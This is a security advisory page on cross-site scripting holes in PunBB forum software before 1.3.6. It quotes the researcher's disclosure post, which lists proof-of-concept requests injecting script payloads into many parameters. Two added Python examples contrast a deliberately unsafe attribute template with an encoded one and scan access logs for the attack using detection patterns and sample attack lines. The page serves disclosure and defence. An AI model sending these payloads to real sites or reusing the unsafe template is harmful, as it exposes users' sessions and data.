PunBB Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1026073
SecurityTracker URL: http://securitytracker.com/id/1026073
CVE Reference: CVE-2011-3371
Updated: Sep 23 2011
Original Entry Date: Sep 20 2011
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): prior to 1.3.6
Description:
A vulnerability was reported in PunBB. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly encode user-supplied input before reflecting it in the page. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PunBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. The proof-of-concept requests in the source message below show the payload closing a double-quoted HTML attribute and its tag ("/>), so the affected parameters, the csrf_token value among them, are reflected in attribute context without HTML encoding.
The 'login.php', 'delete.php', 'edit.php', 'misc.php', 'profile.php', and 'register.php' scripts are affected.
Piotr Duszynski (@drk1wi) reported this vulnerability.
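The reflection described above, as an added example that is not PunBB code and not from the advisory: a request value written raw into a double-quoted attribute beside the same value written through an output encoder, plus the check a tester runs on the response to decide whether a reflection is exploitable. The hidden-field template is an assumption; the advisory only shows that the payload closes a quoted attribute and a tag, not which element the values land in. The PHP equivalent of the hardened call is htmlspecialchars() with ENT_QUOTES; the example itself is Python so it can be run stand-alone.

```python
import html
import re

# Constructed payload in the shape of the advisory's proof of concept: a
# plausible token value followed by "/> to close the attribute and the tag,
# then a script element. (alert(1) stands in for the alert(oink) marker.)
PAYLOAD = '4b072f27396cec5d79"/><script>alert(1)</script>'

SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)


def render_hidden_unsafe(name: str, value: str) -> str:
    """Vulnerable pattern (assumed template, not PunBB's own): the request
    value is concatenated straight into a double-quoted attribute. A value
    containing "/> ends the <input> element early and whatever follows is
    parsed as fresh markup."""
    return f'<input type="hidden" name="{name}" value="{value}" />'


def render_hidden_safe(name: str, value: str) -> str:
    """Hardened pattern: encode at the output sink, for attribute context.
    quote=True encodes both quote characters as well as < > &, so the value
    can no longer terminate the attribute. The PHP equivalent is
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8')."""
    return (
        f'<input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}" />'
    )


def classify_reflection(body: str, payload: str) -> str:
    """The check a tester runs after sending the proof of concept: was the
    payload reflected raw ("unescaped"), HTML-encoded ("escaped"), or not
    at all ("absent")? Only the first case is exploitable."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


def has_live_script(body: str) -> bool:
    """True when the document contains a real <script> start tag (an encoded
    &lt;script&gt; is inert text and does not match)."""
    return SCRIPT_RE.search(body) is not None


def demo() -> dict:
    """Render the same request value through both templates and report."""
    unsafe = render_hidden_unsafe("csrf_token", PAYLOAD)
    safe = render_hidden_safe("csrf_token", PAYLOAD)
    return {
        "unsafe_html": unsafe,
        "unsafe_reflection": classify_reflection(unsafe, PAYLOAD),
        "unsafe_has_script": has_live_script(unsafe),
        "safe_html": safe,
        "safe_reflection": classify_reflection(safe, PAYLOAD),
        "safe_has_script": has_live_script(safe),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

The fix that closes every reflection listed in the advisory at once is the second pattern applied at every output sink, not input filtering: a token, an action name or an e-mail address may legitimately contain characters that look hostile in one context and are harmless in another, and only the sink knows which encoding it needs.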
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PunBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:
The vendor has issued a fix (1.3.6).
The vendor's advisory is available at:
http://punbb.informer.com/forums/topic/24430/punbb-136/
Vendor URL: punbb.informer.com/forums/topic/24430/punbb-136/
Cause:
Input validation error
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
Message History:
None.
Source Message Contents
Date: Fri, 16 Sep 2011 18:43:47 +0200
Subject: [Full-disclosure] PunBB PHP Forum - Multiple XSS
=======================================================================
PunBB PHP Forum - Multiple XSS
=======================================================================
Affected Software : PunBB PHP Forum
Severity : Medium
Local/Remote : Remote
Author : @drk1wi
[Summary]
Just for those whom it might concern.
These vulnerabilities have been identified for the latest (clean
version 1.3.5) during one of my penetration tests.
[Vulnerability Details]
GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
POST /delete.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>
POST /edit.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
POST /login.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>
POST /misc.php?email=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
POST /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>
POST /register.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>
[Time-line]
20/08/2011 - Vendor notified
02/09/2011 - No e-mail reply and BAN on Forum
??? - Vendor patch release
16/09/2011 - Public disclosure
[Fix Information]
Cheers,
Piotr Duszynski (@drk1wi)
http://sharpsec.net
X. LEGAL NOTICES
Copyright (c) 2011 Piotr "drk1wi" Duszynski
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
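As an added example that is neither part of the SecurityTracker alert nor of the original post: a log-side check for attempts against the requests listed in the message above. It parses Apache combined-format access-log lines (the format is an assumption; the sample lines are constructed for this example), keeps only requests to the six scripts the advisory names, percent-decodes each query parameter repeatedly so a double-encoded payload is not missed, and flags values that carry markup or script hooks. It also flags csrf_token values that are not a plain hex string; that token shape is an assumption, since the page does not document PunBB's format. One caveat a practitioner should keep in mind: the POST proofs of concept carry their payloads in the request body as well as the query string, and the body is not in the access log, so catching those needs application-level logging or a WAF in front of the forum.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts named as affected in the advisory.
AFFECTED_SCRIPTS = {"/login.php", "/delete.php", "/edit.php",
                    "/misc.php", "/profile.php", "/register.php"}

# Markup or script hooks that never belong in a forum request parameter.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

# Assumed token shape (hex string); the page does not document PunBB's format.
TOKEN_RE = re.compile(r"\A[0-9a-fA-F]{8,64}\Z")

# Apache combined log format, enough of it to recover client and request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


@dataclass(frozen=True)
class Finding:
    ip: str
    script: str
    param: str
    reason: str


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; double-encoding is a common filter evasion."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line: str) -> list[Finding]:
    """Return findings for one access-log line (empty list if benign or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path not in AFFECTED_SCRIPTS:
        return []
    findings = []
    # parse_qsl already decodes one layer; decode_fully handles the rest.
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = decode_fully(raw)
        if MARKUP_RE.search(value):
            findings.append(Finding(m.group("ip"), url.path, name, "markup in parameter"))
        elif name == "csrf_token" and not TOKEN_RE.match(value):
            findings.append(Finding(m.group("ip"), url.path, name, "malformed csrf_token"))
    return findings


def scan(log_text: str) -> list[Finding]:
    """Run inspect_line over every non-empty line of a log."""
    return [f for line in log_text.splitlines() if line.strip() for f in inspect_line(line)]


# Constructed sample log (not real traffic). Line 1 mirrors the advisory's first
# proof of concept with the payload percent-encoded as a browser would send it;
# line 2 is the same attack double-encoded; lines 3-5 are benign; line 6 has a
# csrf_token that is not hex but carries no markup.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Sep/2011:18:43:47 +0200] "GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Sep/2011:18:44:02 +0200] "GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786%2522%252F%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Sep/2011:18:45:10 +0200] "GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Sep/2011:18:45:11 +0200] "GET /viewtopic.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Sep/2011:18:46:00 +0200] "POST /profile.php?action=change_pass&id=2 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Sep/2011:18:47:30 +0200] "GET /login.php?action=out&id=3&csrf_token=not-a-token HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip} {f.script} param={f.param}: {f.reason}")
```

The scope is deliberately narrow (only the six named scripts) so that the check can run against a patched 1.3.6 install as a regression signal; widening AFFECTED_SCRIPTS to every PHP entry point turns the same code into a generic reflected-markup alert at the cost of more noise from legitimate post bodies.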